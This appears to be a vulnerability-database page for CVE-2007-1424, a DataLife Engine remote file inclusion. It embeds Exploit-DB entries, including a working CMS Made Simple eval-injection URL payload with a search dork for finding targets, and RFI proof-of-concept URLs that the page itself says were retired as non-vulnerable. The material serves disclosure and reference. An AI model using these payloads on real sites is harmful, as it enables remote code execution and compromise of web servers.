CVE-2007-1424
published 2007-03-13CVE-2007-1424: Multiple PHP remote file inclusion vulnerabilities in Softnews Media Group DataLife Engine allow remote attackers to execute arbitrary PHP code via a URL in…
PriorityP338high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.58%
83.3th percentile
Multiple PHP remote file inclusion vulnerabilities in Softnews Media Group DataLife Engine allow remote attackers to execute arbitrary PHP code via a URL in the root_dir parameter to (1) init.php and (2) Ajax/editnews.php. NOTE: some of these details are obtained from third party information.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| softnews_media_group | datalife_engine | — | — |
| softnews_media_group | datalife_engine | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CMS Made Simple 1.2 - Remote Code Execution
exploitdb·2007-09-21
CVE-2007-5056 CMS Made Simple 1.2 - Remote Code Execution
CMS Made Simple 1.2 - Remote Code Execution
---
# o [bug] /"*._ _ #
# . . . .-*'` `*-.._.-'/ #
# o o < * )) , ( #
# . o `*-._`._(__.--*"`.\ #
# #
# vuln.: CMS Made Simple 1.1.2 Remote Code Execution Vulnerability #
# author: [email protected] #
# download: #
# http://dev.cmsmadesimple.org/frs/download.php/1424/cmsmadesimple-1.1.2.zip #
# dork: "powered by CMS Made Simple version 1.1.2" #
# greetz: cOndemned, kacper, str0ke #
# code:
/lib/adodb_lite/adodb-perf-module.inc.php:
...
eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
...
# exploit:
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo();
http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php
Exploit-DB
SoftNews 4.1/5.5 - '/engine/Ajax/editnews.php?root_dir' Remote File Inclusion
exploitdb·2007-03-10
CVE-2007-1424 SoftNews 4.1/5.5 - '/engine/Ajax/editnews.php?root_dir' Remote File Inclusion
SoftNews 4.1/5.5 - '/engine/Ajax/editnews.php?root_dir' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/22913/info
DataLife Engine is prone to multiple remote file-include vulnerabilities.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
NOTE: Further information reveals that the reported vulnerable parameter is actually a constant, not a variable, so it cannot be controlled by an attacker. Since the application is not vulnerable, this BID is being retired.
http://www.example.com/engine/Ajax/editnews.php?root_dir=[Shell-Attack]k]
Exploit-DB
SoftNews 4.1/5.5 - '/engine/init.php?root_dir' Remote File Inclusion
exploitdb·2007-03-10
CVE-2007-1424 SoftNews 4.1/5.5 - '/engine/init.php?root_dir' Remote File Inclusion
SoftNews 4.1/5.5 - '/engine/init.php?root_dir' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/22913/info
DataLife Engine is prone to multiple remote file-include vulnerabilities.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
NOTE: Further information reveals that the reported vulnerable parameter is actually a constant, not a variable, so it cannot be controlled by an attacker. Since the application is not vulnerable, this BID is being retired.
http://www.example.com/engine/init.php?root_dir=[Shell-Attack]
http://osvdb.org/35712http://securityreason.com/securityalert/2411http://www.securityfocus.com/archive/1/462445/100/0/threadedhttp://www.securityfocus.com/bid/22913http://osvdb.org/35712http://securityreason.com/securityalert/2411http://www.securityfocus.com/archive/1/462445/100/0/threadedhttp://www.securityfocus.com/bid/22913
2007-03-13
Published